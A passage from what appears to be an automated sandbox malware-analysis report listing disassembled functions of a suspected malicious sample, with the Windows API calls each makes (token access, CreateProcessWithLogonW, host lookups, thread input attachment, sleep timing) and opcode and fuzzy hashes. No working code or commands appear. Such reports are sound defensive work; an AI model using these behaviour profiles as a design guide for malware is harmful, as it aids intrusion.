                                      • Part of subcall function 00F0410D: _memset.LIBCMT ref: 00F0418D
                                      • Part of subcall function 00F0410D: _wcscpy.LIBCMT ref: 00F041E1
                                      • Part of subcall function 00F0410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F041F1
                                    • KillTimer.USER32(?,00000001,?,?), ref: 00F045B5
                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F045C4
                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F3D6CE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                    • String ID:
                                    • API String ID: 1378193009-0
                                    • Opcode ID: cfe01b0b9459054df2e9129f2072aa937ae2c9d7d6f49d312f82aaa5f7c8a26e
                                    • Instruction ID: 433b7c02c37c6200d10e7b2b6c1550913b4b20f71439b23f2ce16f36dbb4b473
                                    • Opcode Fuzzy Hash: cfe01b0b9459054df2e9129f2072aa937ae2c9d7d6f49d312f82aaa5f7c8a26e
                                    • Instruction Fuzzy Hash: D021DAB19047889FEB328B24DC46BF7BBEC9F01324F04009DE69D97181C7746A88BB51
                                    Function 00F58AF9 Relevance: 6.1, APIs: 4, Instructions: 65processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00F58B2A
                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00F58B31
                                    • CloseHandle.KERNEL32(00000004), ref: 00F58B4B
                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F58B7A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                    • String ID:
                                    • API String ID: 2621361867-0
                                    • Opcode ID: 36a58f87283a196c49b80eb41da2b8bd05c5fd2a185b97d9cf2459eb35102c5c
                                    • Instruction ID: 4dfb71d6ec00a93b9597aff078973848f117ace6995de25a508d87d09e2364c7
                                    • Opcode Fuzzy Hash: 36a58f87283a196c49b80eb41da2b8bd05c5fd2a185b97d9cf2459eb35102c5c
                                    • Instruction Fuzzy Hash: B3114AB260020DBFDB018FA4DD49FEE7BADEB48359F144064FE04A2160C6758D69AB60
                                    Function 00F7667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F05B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F67B20,?,?,00000000), ref: 00F05B8C
                                      • Part of subcall function 00F05B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F67B20,?,?,00000000,?,?), ref: 00F05BB0
                                    • gethostbyname.WS2_32(?), ref: 00F766AC
                                    • WSAGetLastError.WS2_32(00000000), ref: 00F766B7
                                    • _memmove.LIBCMT ref: 00F766E4
                                    • inet_ntoa.WS2_32(?), ref: 00F766EF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                    • String ID:
                                    • API String ID: 1504782959-0
                                    • Opcode ID: 9ebd287337c004e48786478578b194de565948c70235e9e9ac78f1571b230589
                                    • Instruction ID: a0449fd8dee580a4e0f27ec077f383a327edc2d904845e81027002376847acc0
                                    • Opcode Fuzzy Hash: 9ebd287337c004e48786478578b194de565948c70235e9e9ac78f1571b230589
                                    • Instruction Fuzzy Hash: CB116375900508AFCF04FBA4DD86DEE77B8AF44710B148065F506A71A2EF74AE14FB51
                                    Function 00F59023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00F59043
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F59055
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F5906B
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F59086
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID:
                                    • API String ID: 3850602802-0
                                    • Opcode ID: 80b6bf90bd87686d06c5a3c9d0e0fa139bd3d8eebca30af5dd6a2d115ec0b41b
                                    • Instruction ID: 8cf9019866735fd2687427c3d977d9d1b74a22e2a8be2bcb33ca8994b4798db9
                                    • Opcode Fuzzy Hash: 80b6bf90bd87686d06c5a3c9d0e0fa139bd3d8eebca30af5dd6a2d115ec0b41b
                                    • Instruction Fuzzy Hash: AD115E7A900218FFDB10DFA5CC84FADBB74FB48310F204095EA04B7290D6716E54EB90
                                    Function 00F61652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00F601FD,?,00F61250,?,00008000), ref: 00F6166F
                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00F601FD,?,00F61250,?,00008000), ref: 00F61694
                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00F601FD,?,00F61250,?,00008000), ref: 00F6169E
                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,00F601FD,?,00F61250,?,00008000), ref: 00F616D1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CounterPerformanceQuerySleep
                                    • String ID:
                                    • API String ID: 2875609808-0
                                    • Opcode ID: dae0c91150d88389b9b4ab2e581de7bdaf5c3497890d1d4498f1ca08ee9162cf
                                    • Instruction ID: a1bde6d8da1b8e055359aae0de89f72ade6fe9448fea0b4d84fc3a44154a262b
                                    • Opcode Fuzzy Hash: dae0c91150d88389b9b4ab2e581de7bdaf5c3497890d1d4498f1ca08ee9162cf
                                    • Instruction Fuzzy Hash: ED113C36C0052DEBCF009FA5D948AFEBB78FF09751F494565E940F6240CB315560AB96
                                    Function 00F37207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                    • String ID:
                                    • API String ID: 3016257755-0
                                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                    • Instruction ID: bc459073827c128dcb9b519fdcdd545bc4f253754a4119915aeb7b66096d9380
                                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                    • Instruction Fuzzy Hash: 980142B644424EBBCF226E84CC018EE3F62BF59361F548615FE1858031D236C971BF81
                                    Function 00F8B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowRect.USER32(?,?), ref: 00F8B59E
                                    • ScreenToClient.USER32(?,?), ref: 00F8B5B6
                                    • ScreenToClient.USER32(?,?), ref: 00F8B5DA
                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F8B5F5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ClientRectScreen$InvalidateWindow
                                    • String ID:
                                    • API String ID: 357397906-0
                                    • Opcode ID: 76c11ff3474f6a394f81fb204425d8fad2e9c89bc98f2c71f814915b52319106
                                    • Instruction ID: 86eaa80cf57324e6513dd95b4a3489d36fff6aac6f06c609785f8beddf49903f
                                    • Opcode Fuzzy Hash: 76c11ff3474f6a394f81fb204425d8fad2e9c89bc98f2c71f814915b52319106
                                    • Instruction Fuzzy Hash: 1B1134B5D0020DEFDB41DF99C8449EEBBB5FB08311F104166E914E2220D735AA559F50
                                    Function 00F8B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 00F8B8FE
                                    • _memset.LIBCMT ref: 00F8B90D
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00FC7F20,00FC7F64), ref: 00F8B93C
                                    • CloseHandle.KERNEL32 ref: 00F8B94E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _memset$CloseCreateHandleProcess
                                    • String ID:
                                    • API String ID: 3277943733-0
                                    • Opcode ID: acccd09601285721448b639ef8f983aef0c145a6f6aef0d1bd81066d9a12dcec
                                    • Instruction ID: d4f161c8d95a8afc29a507758913d905bb685d5384575f3f27dec0fc09c72286
                                    • Opcode Fuzzy Hash: acccd09601285721448b639ef8f983aef0c145a6f6aef0d1bd81066d9a12dcec
                                    • Instruction Fuzzy Hash: 86F05EF25443197FE2107761AD86FBB3A5CEB08358F000028BA08D6192D7764900EBF8
                                    Function 00F66E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlEnterCriticalSection.NTDLL(?), ref: 00F66E88
                                      • Part of subcall function 00F6794E: _memset.LIBCMT ref: 00F67983
                                    • _memmove.LIBCMT ref: 00F66EAB
                                    • _memset.LIBCMT ref: 00F66EB8
                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 00F66EC8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CriticalSection_memset$EnterLeave_memmove
                                    • String ID:
                                    • API String ID: 48991266-0
                                    • Opcode ID: fab454d4c6c0e9cb6e37aa283614abb325a708c6d5c1242fd276db76721bcf2d
                                    • Instruction ID: cc1239e4575c8defec170415f936061ea870007c4d8c7b9c1d5c4eff393f818f
                                    • Opcode Fuzzy Hash: fab454d4c6c0e9cb6e37aa283614abb325a708c6d5c1242fd276db76721bcf2d
                                    • Instruction Fuzzy Hash: F4F0547A100214ABCF016F55EC85E99BB29EF45360B048065FE085E21BC739A911EBB4
                                    Function 00F8C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F012F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F0134D
                                      • Part of subcall function 00F012F3: SelectObject.GDI32(?,00000000), ref: 00F0135C
                                      • Part of subcall function 00F012F3: BeginPath.GDI32(?), ref: 00F01373
                                      • Part of subcall function 00F012F3: SelectObject.GDI32(?,00000000), ref: 00F0139C
                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00F8C030
                                    • LineTo.GDI32(00000000,?,?), ref: 00F8C03D
                                    • EndPath.GDI32(00000000), ref: 00F8C04D
                                    • StrokePath.GDI32(00000000), ref: 00F8C05B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                    • String ID:
                                    • API String ID: 1539411459-0
                                    • Opcode ID: 8016e2609a299a13b2792035708a98a26b33061d6a50763c9f0add5cbaa3362e
                                    • Instruction ID: ed7a2b1b822dcc895c5f28b679aed52407b9712cf15c87f8f6cde726bbcf7aea
                                    • Opcode Fuzzy Hash: 8016e2609a299a13b2792035708a98a26b33061d6a50763c9f0add5cbaa3362e
                                    • Instruction Fuzzy Hash: 46F05E3100525DBFDB126F54AC0AFDE3F59AF05721F144010FA11A50E287755565FBE5
                                    Function 00F5A37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00F5A399
                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F5A3AC
                                    • GetCurrentThreadId.KERNEL32 ref: 00F5A3B3
                                    • AttachThreadInput.USER32(00000000), ref: 00F5A3BA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                    • String ID:
                                    • API String ID: 2710830443-0
                                    • Opcode ID: 1cd886988f5527e8a7573a828165aa2902d1ef09bec32190b63240bc4be1e4e7
                                    • Instruction ID: 029357af45f3e30e945453628c40a17cf5f6b2fcc84fbd6a658d91fa4a6ced4b
                                    • Opcode Fuzzy Hash: 1cd886988f5527e8a7573a828165aa2902d1ef09bec32190b63240bc4be1e4e7
                                    • Instruction Fuzzy Hash: 98E0C93164522CBADB205BA2DC0DEE77F5CEF167A2F008225FA0995060D6768568EBA1
                                    Function 00F02218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSysColor.USER32(00000008), ref: 00F02231
                                    • SetTextColor.GDI32(?,000000FF), ref: 00F0223B
                                    • SetBkMode.GDI32(?,00000001), ref: 00F02250
                                    • GetStockObject.GDI32(00000005), ref: 00F02258
                                    • GetWindowDC.USER32(?,00000000), ref: 00F3C0D3
                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F3C0E0
                                    • GetPixel.GDI32(00000000,?,00000000), ref: 00F3C0F9
                                    • GetPixel.GDI32(00000000,00000000,?), ref: 00F3C112
                                    • GetPixel.GDI32(00000000,?,?), ref: 00F3C132
                                    • ReleaseDC.USER32(?,00000000), ref: 00F3C13D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                    • String ID:
                                    • API String ID: 1946975507-0
                                    • Opcode ID: 286d7b081caa3005b68542235fac5c2274a98cd0e552afbe5b943e2174d5688b
                                    • Instruction ID: ceed155263ab6ea4667e99f7e2da5e086166aa9c8bb50f84e9db61ffdce21378
                                    • Opcode Fuzzy Hash: 286d7b081caa3005b68542235fac5c2274a98cd0e552afbe5b943e2174d5688b
                                    • Instruction Fuzzy Hash: 13E06D32900648EFEB216FA4FC0D7E83B10EB05332F148366FA69980F187724994FB61
                                    Function 00F58C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentThread.KERNEL32 ref: 00F58C63
                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,00F5882E), ref: 00F58C6A
                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00F5882E), ref: 00F58C77
                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,00F5882E), ref: 00F58C7E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CurrentOpenProcessThreadToken
                                    • String ID:
                                    • API String ID: 3974789173-0
                                    • Opcode ID: c3a8f457482d2641e59b10e53e866a07b7f29128025548ccee98039fe5a15ea4
                                    • Instruction ID: 7af8c20467c0da31799e195056569ab4f825962a09f30a2775401e18895d432a
                                    • Opcode Fuzzy Hash: c3a8f457482d2641e59b10e53e866a07b7f29128025548ccee98039fe5a15ea4
                                    • Instruction Fuzzy Hash: 90E04F36A422159FD7205FB06D0CBA63BA8AF547A2F154828A645D9040DA34844AAB61
                                    Function 00F42187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDesktopWindow.USER32 ref: 00F42187
                                    • GetDC.USER32(00000000), ref: 00F42191
                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F421B1
                                    • ReleaseDC.USER32(?), ref: 00F421D2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CapsDesktopDeviceReleaseWindow
                                    • String ID:
                                    • API String ID: 2889604237-0
                                    • Opcode ID: 4a0658391422b212cd604f2f11af19dec2d52c1e830df9af6e1742620f20d341
                                    • Instruction ID: 149bf2e21c298b0e41c3ac6be4ff9de6e8bfe7c35a66471621417577a22f27f4
                                    • Opcode Fuzzy Hash: 4a0658391422b212cd604f2f11af19dec2d52c1e830df9af6e1742620f20d341
                                    • Instruction Fuzzy Hash: 00E0E575800208EFDB419F60C808AAD7BB1EF5C350F108525FD5AD7260EB788155BF40
